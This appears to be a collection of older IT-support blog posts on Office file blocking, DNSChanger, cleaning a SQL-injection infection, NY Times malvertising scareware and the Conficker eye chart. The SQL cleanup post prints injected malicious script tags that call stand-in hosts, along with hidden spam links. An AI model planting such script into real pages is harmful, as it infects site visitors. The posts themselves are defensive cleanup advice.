Internet File Blocking on Server 2008 and Windows 7

We’ve got a client who recently upgraded their Windows Server 2008 Remote Desktop Services box from Office 2003 to Office 2010.  In doing so, they ran up against Internet File Blocking which Office 2010 seems to take seriously, where Office 2003 ignored it.

In a nutshell, any file you download from an “insecure” location, like say, your email, gets a tag injected in its Alternate Data Stream marking it as potentially unsafe, so when you try to open it using Office 2010, you get this helpful dialog:

blockeddoc

File permissions are fine and disk space and memory is plentiful, so what’s the glitch?  It’s the alternative data stream, a hidden feature of NTFS that allows, well, alternate data to be stored along with your file; so in our case, every downloaded file has a Zone Identifier in its ADS, and Office will hemorrage with an unhelpful dialog if it comes across something.  Internet Explorer at leasthas the decency to tell you the score:

ofsw

So, the question is how does one open these files in Office?

One way is to right click on the file, go into the properties tab and click the UNBLOCK button

fileblock3_30790E2A

But that can get tedious.

You can use SYSINTERNALS’s streams.exe file to strip the ADS out of a bunch of files.

Or, you can turn the behavior off, which is what we did for our client.

A quick trip to the Google brought us to Dixin’s Blog (which is where we cribbed the “file properties” screenshot from) and the steps are laid out very clearly there.

In a nutshell, go to Group Policies and edit or create a policy to enable a single setting in User Configuration > Administrative Templates > Windows Components > Attachment Manager > Do Not Preserve Zone Information in File Attachments.  

Log off and log back on, and you’re good to go.

(We also forced the “Notify Antivirus Programs When Opening Attachments” setting, just to be on the safe side).

Anyway, you should really just go read the article over at Dixin’s Blog and read Understanding The Internet File Blocking and Unblocking, it’s much better than this one.  Lots of screenshots and explanatory text in an easy to read manner.

 

 

DNSChanger – Will The Internet Break Tomorrow?

I’ve been asked by folks and have seen on FB about the “Internet shutting off” tomorrow — here’s my stock reply:

The malware which infected some machines is old, actually. These aren’t new infections. The malware changed your computer’s DNS servers to ones that the bad guys controlled, which is the equivalent of someone switching your 411 operator with their own nefarious operator, so when you tried to get the number for Domino’s, they’d give you the number for Pizza Hut.

The bad guys’ servers were seized back in 2011 and were reset to be benign, but under a court order, the FBI and other law enforcement agencies have to turn off the servers tomorrow, July 9, 2012.

Google, Facebook and others are able to detect if you’re using those servers and have been putting up messages to those users whose machines have still not been cleaned, months after the fact.

So, if you haven’t seen a message from Google or Facebook, you’re fine, nothing to see here.

Facebook posted a blog entry about their efforts.

Geek News Central said this about it:

The most interest part of this story of course was not the DNSChanger bot, itself, but how the FBI and the court handled it. They could have shut it down immediate and the results would have been the same for those 300,000 plus 270,00 more. By delaying the shut down they did allow those 270,000 to recover. However it seems to me they dropped the ball in getting the word out. This didn’t become big news until the past week. I am not sure if the court and the FBI is to be blamed for this, or is it the media’s fault for not getting the word out. Whose ever fault it is, communication was lacking.

 

Cleaning Up After a SQL Injection Attack, Part 2

Got a call today off our previous article in this series from Branden of Hot Media Group, Inc., aChicago-based web application development, networking, and graphic design firm who found himself with a database full of malware infections, but the characteristics of his attack didn’t match what we had written about, so he called us up. We reviewed his symptoms and were able to tweak the code we provided previously to work with this new set of issues.

We weren’t able to see how the site was attacked, nor did we worry about how the site would be steeled against future occurrence (always use stored procedures and/or parametrized queries, kids!) — this was purely a cleanup job.

This is the code we had:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'],'''', '''')') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99 OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN PRINT ('UPDATE ['+@T+'] SET ['+@C+']=cast(replace(cast(['+@C+'] as nvarchar(4000)),'''','''') as ntext)')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And that worked fine, but it had some shortcomings — mostly it only stripped out a single bit of invasive code, and our new friend had quite a bit of code to deal with, so instead of the almost quaint looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

We had this jumble of code in every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden — an accomplished ColdFusion developer — suggests “why don’t we just drop everything to the right of the <script> tag?”
Continue reading Cleaning Up After a SQL Injection Attack, Part 2

Malware served from NY Times Website

I’ve gotten two calls from clients (OK, one was a client, the other my mother-in-law) saying they visited the NYTimes website and were attacked by malware.

This is true, they were. My MIL said she was trying to read Maureen Dowd and got hit with a rogue anti-spyware application. I was able to CoPilot in and clean things up. (There didn’t seem much to clean up, I killed a running process of IE (she uses Chrome) and the scare-screen went away.

I sparked up an unpatchedWinXP Virtual Machine running IE6 and went to the NYT website, and was prompted immediately to install flash. I opted not to and surfed around the site, fighting the information bar’s insistence that I install an ActiveX Control.

So, I gave in and voila!

protection-check07.com dialog

So, no matter how you answer, you’re already stung.

Of course, your instinct is to click “Cancel” and you do, and then you’re scared out of your wits when confronted with this page from protection-check07.com (don’t go there!) and proceeds to make you think you’re infected.

protection-check07.com demo

But, if we take a second to look at the scare box, we see something is amiss…

Local Drive

We don’t have an E: drive … and the optical drive we have is a CD-Rom, not a DVD-RAM drive…

My Computer

The page that pops up is meant to scare you. The infections it reports are false — the only infection you have (at the moment) is the webpage. If you go into taskmanager and find iexplorer.exe (or firefox.exe if you use Mozilla Firefox) and right-click on it and choose “End Process” that should make the pop-up go away.

If you click ANYWHERE on the page, it will prompt you to download a program:

Malware Downloader

Seems reasonable — you got a warning you were infected, and you want to download a file called “Scanner-75f_2015.exe” seems legit.

IT’S NOT.

(But you knew that by now, right?)

However, this is a clear indication of how a fully patched system gets compromised. Some buys ad space on a major website. They probably serve a lot of legit ads, but in a few instances, they serve illegitmate ads. In this case, they seem to be using Flash as an attack vector. Flash movie loads and redirects your browser to a rogue site, and they’re off to the races.

Since I’m a professional, I downloaded the file — I didn’t run it — and I submitted it to http://virscan.org an online file scanner which tests a file against 37 of the leading anti-virus vendors.

Somewhat sadly, only 5 out of 37 scanners picked this up as malware:

Malware Results

I also ran the file thru VirusTotal.com which tests against 41 scanners, and 7 scanners turned up a positive on our file:

VirusTotal.com Results

You can see the full report over on VirusTotal’s site: http://www.virustotal.com/analisis/7bda9187e26b5a185501874b201731f12e3604c078408500abda83c35ef2fbe1-1252857630

The one thing that surprised me on the results was Microsoft’s detection, trumping McAfee, Symantec, AVG and Clam-AV among many others. I’ve never considered MS a true player in the anti-malware landscape, but perhaps I will re-evaluate.

Kaspersky, and most othersecurity vendors, offers an online scan of your system (requires Java). If you don’t have an anti-virus product installed — or even if you do — you might want to visit a different security vendor site than the one you have to do a check. Belt and suspenders and all that.

(This piece of spyware also eluded my trustyMalwarebytes Anti-Malware (www.malwarebytes.org) which should reinforce that no one piece of software can provide 100% protection.

There is no strong defense for this, as nothing you overtly do can cause it. Make sure your anti-virus is up to date, do regular scans of your computer — but MOST importantly –keep backups.

As for the clients, one of them uses Norton GoBACK (since superceded in the marketplace by Ghost 14) , so they restored their machine back an hour before the infection occurred, went back to the NY Times site, got re-infected, restored AGAIN using GoBack, and then stayed away from the NY Times site. And my Mother-in-Law has been trained well and as soon as the box popped up, she called me and I was able to CoPilot into her machine and close IE before it did any damage… may you all be as lucky.

Further Info:

http://ask.metafilter.com/132707/nytimes-spyware

http://discussions.apple.com/thread.jspa?messageID=10197120&tstart=0

http://forums.mozillazine.org/viewtopic.php?f=38&t=1481195

[UPDATE: 1:30 PM, Sunday Sept 13 – the NY Times site seems to have stopped serving the ad. Further attempts to get infected have proven unsuccessful.]

Conficker Eye Chart

If you’re worried about this <scary voice>virus of doom</scary voice> that everyone’s gone mental over, you might want to pop over to The Conficker Eye Chart that the Conficker Working Group has put together.

Basicially, the eye chart is a page that loads images from sites that Conficker actively blocks. So, if you can see all the images, you’re not infected. Pretty clever.

If you are infected, you might want to drop us a line.